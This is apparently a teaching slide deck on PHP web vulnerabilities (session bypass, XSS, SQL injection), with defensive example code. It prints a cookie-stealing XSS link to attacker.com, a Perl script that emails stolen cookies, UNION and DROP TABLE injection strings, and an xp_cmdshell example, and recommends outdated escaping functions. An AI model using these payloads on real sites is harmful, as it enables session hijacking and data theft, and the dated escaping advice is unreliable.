Web Vulnerability
Saharudin Saat
Session_start();
The most common
• No session control (bypass authentication)
• XSS attack (cross site scripting)
• SQL injection
• Default?
Session Control
Is this site vulnerable?
Session Control
• The user needs to log in before accessing the system
• Does the code really process the username and password?
• In this case – no login required
• We can bypass the login page just by entering the URL http://localhost/latihan/home.php
Session Control
An intruder can bypass your system just by entering the page URL!!
Session Control Recommendation
• Use sessions: session_start();
• Every sensitive page must have access level control, e.g.

  if($level =='1') {
      header("Location: admin_menu.php");
  } else if($level=='2') {
      header("Location: approve.php");
  } else if($level=='4') {
      header("Location: report.php");
  }
Session Control
• Check whether no password was entered; if so, redirect to the login page again:

  if($pwd==''){
  ?>
  <script language="javascript">
      alert("not authorized!!");
      window.location = "index.php";
  </script>
  <?php
  }
The validation process needs to be on the server side to prevent code injection. Refer to the e-rent folder, file name session.php.
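As an added example (not the deck's e-rent session.php), here is the server-side version of the two recommendations above: a login that really verifies the password before populating the session, and a fail-closed level check for sensitive pages. The user store is constructed sample data, and the level values follow the slide's scheme (1 admin, 2 approve, 4 report).

```php
<?php
// Added example, not the deck's e-rent session.php: a login that really checks the
// password, plus the access check every sensitive page must make. The user store is
// constructed sample data; levels follow the slide (1 admin, 2 approve, 4 report).
session_start();

function findUser(string $userid): ?array
{
    static $users = null;                     // constructed stand-in for the DB
    if ($users === null) {
        $users = ['admin' => ['userid' => 'admin', 'level' => '1',
                  'pwdhash' => password_hash('Change-Me-1', PASSWORD_DEFAULT)]];
    }
    return $users[$userid] ?? null;
}

// index.php: only populate the session after the password has been verified.
function login(array $post): bool
{
    $user = $post['username'] ?? '';
    $pwd  = $post['password'] ?? '';
    if ($user === '' || $pwd === '') {
        return false;                         // the slide's "no password entered" case
    }
    $row = findUser($user);
    if ($row === null || !password_verify($pwd, $row['pwdhash'])) {
        return false;
    }
    session_regenerate_id(true);              // fresh session id once authenticated
    $_SESSION['userid'] = $row['userid'];
    $_SESSION['level']  = $row['level'];
    return true;
}

// Top of admin_menu.php etc.: fail closed unless the session carries the required
// level, so requesting the page by URL, as on the slides, only redirects to login.
function requireLevel(string $required): void
{
    if (empty($_SESSION['userid']) || ($_SESSION['level'] ?? null) !== $required) {
        session_unset();
        header('Location: index.php');        // server-side redirect, not a JS alert
        exit;
    }
}

// Where to send a user after login, replacing the slide's if/else chain.
function menuFor(string $level): string
{
    $menus = ['1' => 'admin_menu.php', '2' => 'approve.php', '4' => 'report.php'];
    return $menus[$level] ?? 'index.php';
}
```

Call requireLevel('1') before any output on admin_menu.php, since header() redirects only work while no output has been sent yet.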
XSS (cross site scripting)
XSS (cross site scripting)
• By the successful code injection into the username input box, <script>alert("Boleh xss"), we know that this site is vulnerable to XSS attack.
• The attacker can social-engineer his victims into clicking on a malicious URL to steal cookies (phishing).
XSS (cross site scripting)
XSS (cross site scripting)
Look at this!

document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);" onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true" onMouseOut="window.status='';return true"> Check this CNN story out!
XSS (cross site scripting)
  # The QUERY_STRING environment variable should be filled with
  # the cookie text after steal.cgi:
  # http://www.attacker.com/steal.cgi?XXXXX
  print COOKIES "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
  # now email the alert as well so we can start to hijack
  open(MAIL,"|$mailprog -t");
  print MAIL "To: attacker\@attacker.com\n";
  print MAIL "From: cookie_steal\@attacker.com\n";
  print MAIL "Subject: Stolen Cookie Submission\n\n";
  print MAIL "-" x 75 . "\n\n";
  print MAIL "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
  close (MAIL);
XSS (cross site scripting) Recommendation
• Use POST rather than GET in forms. Specify POST in the method attribute of your forms. Of course, this isn't appropriate for all of your forms, but it is appropriate when a form is performing an action, such as buying stocks. In fact, the HTTP specification requires that GET be considered safe.
• Use $_POST rather than relying on register_globals. Using the POST method for form submissions is useless if you rely on register_globals and reference form variables like $symbol and $quantity. It is also useless if you use $_REQUEST.
• Do not focus on convenience.
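As an added example (not code from the deck), the username echo that lets the slide's <script>alert("Boleh xss") payload execute, beside a hardened version that reads the field from $_POST only and HTML-encodes it at output time. The page name welcome.php and the field name are assumptions.

```php
<?php
// Added example, not from the deck: the username echo that let the slide's
// <script>alert("Boleh xss") payload run, next to a hardened version. The page
// name welcome.php and the form field name are assumptions.

// Vulnerable: the raw field is written straight into the HTML, so a <script>
// tag, or an onMouseOver attribute in a crafted link, is parsed as code.
function renderVulnerable(string $username): string
{
    return "<p>Welcome, $username</p>";
}

// Hardened: encode at output time. ENT_QUOTES also encodes ' and ", which is
// what stops the onMouseOver="..." trick inside attribute values.
function renderSafe(string $username): string
{
    $safe = htmlspecialchars($username, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Welcome, $safe</p>";
}

// Per the slide's advice, read the field from $_POST only (never $_REQUEST or
// register_globals), so a link someone is tricked into clicking cannot carry it.
function usernameFromRequest(): string
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        return '';
    }
    return (string) ($_POST['username'] ?? '');
}

if (PHP_SAPI === 'cli') {
    // Stand-alone demonstration with the slide's payload as constructed input.
    $payload = '<script>alert("Boleh xss")</script>';
    echo renderVulnerable($payload), "\n", renderSafe($payload), "\n";
} else {
    header('Content-Type: text/html; charset=UTF-8');   // pin the charset the encoder assumed
    echo renderSafe(usernameFromRequest());
}
```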
SQL injection
Simple SQL injection to use a valid username and password
SQL injection
The attacker uses the first valid user in table login
SQL injection
• The attacker might be lucky if the first name inside table login is an administrator.
• If not? He might want to find the administrator login and password.
• Can the attacker do that?
SQL injection
By inserting a union statement in the URL, the attacker can view all logins and passwords
SQL injection
• The original URL looks like this: http://localhost/latihan/staffdetail.php?nostaf=654321
• The attacker then might try a union SQL statement to view the username and password inside the login table, which looks like this:
  http://localhost/latihan/staffdetail.php?nostaf=654321%20union%20select%201,2,userid,katalaluan%20from%20administrator

* Note: %20 is the URL encoding for a space
SQL injection
• If SQL injection is possible, it is not impossible for the attacker to drop a table by adding a drop table statement:

  SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%';

• In some cases, the attacker makes "EXEC xp_cmdshell 'dir c:'" the @query argument to view the output of "dir c:" in the webpage.
SQL injection Recommendation
Filter your data.
• This cannot be overstressed. With good data filtering in place, most security concerns are mitigated, and some are practically eliminated.
Quote your data.
• If your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type.
Escape your data.
• Sometimes valid data can unintentionally interfere with the format of the SQL statement itself. Use mysql_escape_string() or an escaping function native to your particular database. If there isn't a specific one, addslashes() is a good last resort.
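As an added example (not the deck's staffdetail.php), the concatenated query that lets ?nostaf=654321 union select ... read another table, beside a version that applies the "filter your data" rule and then binds the value as a parameter. Table and column names (staff: nostaf, nama) are assumptions, and the data is constructed in an in-memory SQLite database; the prepared statement replaces the slide's mysql_escape_string() advice, since that function no longer exists in current PHP.

```php
<?php
// Added example, not the deck's staffdetail.php: the concatenated query that lets
// ?nostaf=654321 union select ... read another table, beside a filtered and
// parameterised version. Table and column names (staff: nostaf, nama) are assumed;
// the data below is constructed and lives in an in-memory SQLite database.

// Vulnerable: the GET value becomes part of the SQL text, so the attacker's
// UNION SELECT is executed as part of the statement.
function buildVulnerableQuery(string $nostaf): string
{
    return "SELECT * FROM staff WHERE nostaf = $nostaf";
}

// Filter (the slide's first rule): a staff number is digits only, nothing else.
function validNostaf(string $value): bool
{
    return $value !== '' && strlen($value) <= 10 && ctype_digit($value);
}

// Separate data from SQL: a prepared statement binds the value as a parameter,
// so quoting or a UNION inside it can never change the statement. This replaces
// the slide's mysql_escape_string() advice, which is gone from current PHP.
function fetchStaff(PDO $db, string $nostaf): ?array
{
    if (!validNostaf($nostaf)) {
        return null;                              // rejected before any SQL runs
    }
    $stmt = $db->prepare('SELECT nostaf, nama FROM staff WHERE nostaf = :nostaf');
    $stmt->bindValue(':nostaf', $nostaf, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Stand-alone run on constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE staff (nostaf TEXT, nama TEXT)');
$db->exec("INSERT INTO staff VALUES ('654321', 'Sample Staff')");

$injected = '654321 union select 1,2,userid,katalaluan from administrator';
echo buildVulnerableQuery($injected), "\n";          // the hijacked statement text
var_dump(fetchStaff($db, '654321'));                  // legitimate lookup
var_dump(fetchStaff($db, $injected));                 // stopped by validNostaf()
```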
Default?
Do you realize that other people on the internet can view your default settings?
Default?
Pay attention to any alert from third-party software about your web security
Default?
An attacker might browse your server files to find any information
session_destroy();
Thank You